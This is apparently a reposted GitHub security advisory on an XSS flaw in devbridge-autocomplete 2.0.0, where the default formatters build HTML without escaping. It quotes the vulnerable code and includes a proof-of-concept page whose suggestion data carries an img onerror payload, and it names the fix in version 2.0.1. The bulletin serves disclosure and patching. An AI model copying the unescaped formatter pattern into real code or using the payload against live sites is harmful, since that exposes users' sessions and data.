【中危】devbridge-autocomplete has XSS in its default formatters: formatGroup and formatResult fail to escape HTML i

安全速报 · 严重级:中危 · CVSS:5.4 · GHSA-hvqh-jw65-wcpq

漏洞概要

Summary

The default formatGroup and formatResult functions in devbridge-autocomplete concatenate values into HTML without escaping, allowing XSS when an attacker controls (or can taint) the suggestion data source.

Details

1. formatGroup — category is interpolated raw.

src/format.ts:

function formatGroup(suggestion, category) {
    return '<div class="autocomplete-group">' + category + '</div>';
}

If groupBy is used and the grouping field of any suggestion contains HTML, that HTML is executed.

2. formatResult — early-return branch returns suggestion.value raw.

src/format.ts:

function formatResult(suggestion, currentValue) {
    if (!currentValue) {
        return suggestion.value;   // un-escaped
    }
    /* ... non-empty path escapes correctly ... */
}

The early-return branch is reached when suggest() renders with an empty currentValue, which happens with minChars: 0 and a server that returns suggestions for an empty query. The returned string is concatenated into the container's innerHTML.

PoC (formatGroup)

<!DOCTYPE html>
<html>
<head>
    <meta charset="utf-8">
    <title>PoC: formatGroup XSS in jQuery-Autocomplete v2.0.0</title>
</head>
<body>
    <input id="ac" type="text" placeholder="Type 'a' to trigger" autocomplete="off">

    <script src="https://code.jquery.com/jquery-3.7.1.min.js"></script>
    <script src="dist/jquery.autocomplete.js"></script>
    <script>
        var poisoned = [
            { value: 'Apple',   data: { category: "<img src=x onerror=\"alert('XSS via formatGroup')\">" } },
            { value: 'Avocado', data: { category: 'Safe Group' } }
        ];

        $('#ac').devbridgeAutocomplete({
            lookup: poisoned,
            groupBy: 'category',
            minChars: 1
        });
    </script>
</body>
</html>

Originally identified by an earlier human analysis; the PoC above was produced with the assistance of Claude Opus 4.7.

Impact

XSS in pages that render attacker-controllable suggestion data. The actual impact depends on what the embedding page has access to (cookies, session tokens, DOM), per standard reflected/stored XSS.

Patch

Both formatters now run their interpolated input through the browser's text-node escaping (createElement + textContent) before producing the HTML string. Fixed in version 2.0.1.

受影响组件

修复建议

升级 devbridge-autocomplete 至 2.0.1 或更高版本。

参考链接

• GitHub Advisory GHSA-hvqh-jw65-wcpq
• https://github.com/devbridge/jQuery-Autocomplete/security/advisories/GHSA-hvqh-jw65-wcpq
• https://github.com/devbridge/jQuery-Autocomplete/commit/63ff096ff5b77a90aac7fb5dad7c86e538a59ce0

本文基于 GitHub Advisory Database(CC-BY-4.0 授权)整理,数据来源已注明。